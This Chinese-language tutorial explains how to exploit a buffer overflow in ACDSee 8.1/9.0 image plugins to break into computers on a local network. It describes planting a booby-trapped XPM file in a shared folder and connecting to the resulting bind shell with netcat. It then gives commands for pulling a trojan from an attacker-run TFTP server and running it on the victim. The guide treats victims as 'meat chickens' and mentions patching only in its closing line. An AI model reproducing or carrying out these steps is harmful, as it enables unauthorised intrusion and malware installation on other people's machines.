对于ACDSee的大名,想必各位都不陌生。不过最近ACDSee所使用的ID_X.apl、IDE_ACDStd.apl、ID_PSP.ap和AM_LHA.apl插件在处理XBM/XPM/PSP/LHA文件时出现缓冲区溢出漏洞,如果用户打开了带有超长字符串的XBM/XPM/PSP/LHA文件的话,就可能触发这些溢出,导致执行任意指令。
本次提到的漏洞影响的版本是ACDSee Photo Manager 9.0和ACDSee Photo Manager 8.1。我们下面就具体分析一下漏洞利用的全过程。
漏洞初显
假设在一个局域网中,终端上装有ACDSee 8.1。则这个漏洞就可以派上用场了!毕竟对于这类软件,用户更新较少,对于漏洞的利用率还是很高的。
ACDSee Pro 8.1
首先利用ACDSee XPM文件溢出利用工具,将其放到一个文件夹中,然后打开“记事本”,在其中输入如下的代码:acdsee.exe 1 test.xpm,然后保存为一个批处理文件1.bat,和利用工具acdsee.exe放到一个文件夹中。现在双击运行1.bat,就会在这个目录下面生成一个名字为test.xpm的文件了,这个XPM文件是默认被ACDSee程序关联打开的。
提醒用户,使用这个bat文件是为了执行命令的方便,你也可以在cmd中进入到这个目录中,然后执行“acdsee.exe 1 test.xpm”,效果是一样的。
我们可以先在终端上进行测试,运行XPM文件,打开ACDSee窗口后发现其处于崩溃状态。这就是溢出的结果了,下面只有在“任务管理器”里把ACDSee终结了,然后“命令提示符”窗口,在其中输入“netstat -an”命令来查看本机的端口开放情况,如果4444端口打开了,并且处于监听状态,可以说万事俱备。把这个文件发到共享区中,如果其它用户下载并开启了程序,则漏洞入侵就开始了。
4444端口打开了,并且处于监听状态
终端陷阱
静待一段时间,如果幸运的话,用扫描器扫描后会发现有4444端口开启的终端(如图6),下面就该用NC来连接肉鸡以实现控制了。打开“记事本”程序,在其中输入如下的代码:nc 192.168.0.151 4444 (192.168.0.151是目标终端的IP地址,4444就是它打开的待接端口),然后保存为一个批处理文件2.bat,和nc.exe放在同一个目录里。
端口扫描
双击运行2.bat这个文件,看见了?我们的NC顺利的连接上了肉鸡(如图7),并且返回了一个CMDShell,现在我们在这个窗口里的操作就等同于在肉鸡上执行命令了,嘻嘻。该是上传个木马的时候了,总不能什么都在这个命令提示符里操作吧,多不方便啊。说到上传木马, 黑客最常用的就是tftp上传了,但是小菜们可能还不太熟悉tftp的使用,下面我来详细操作一下。 上传木马
接下来的入侵方法就简单了,比如通过木马客户端,利用“TFTPD32”把它和我们要上传的木马muma.exe放到同一个一个目录下,运行它之后就会自动在本机搭建一个TFTP服务器了。最后,将TFTPD32最小化,在刚刚得到的CMDShell里输入如下命令并回车确定: tftp -i 192.168.0.149 get muma.exe D:\muma.exe,就可以看到上传成功的显示了。
IPConfig
TFTPD32
192.168.0.149是本地的IP地址,这条命令作用是把本机上的和TFTPD32在同一目录下的muma.exe上传到192.168.0.151上,并且放置到D:\下。如果muma.exe不是和TFTPD32.exe放在同一目录下的话,也可以把上句中的muma.exe换成绝对路径,比如C:\windows\muma.exe,一样可以成功上传。
输入命令muma.exe运行即可,至此,一次完整的漏洞利用及入侵过程就结束了,ACDSee的这个漏洞非常隐蔽,但对于局域网用户来说却异常可怕,管理员还是批量升级软件吧。 |
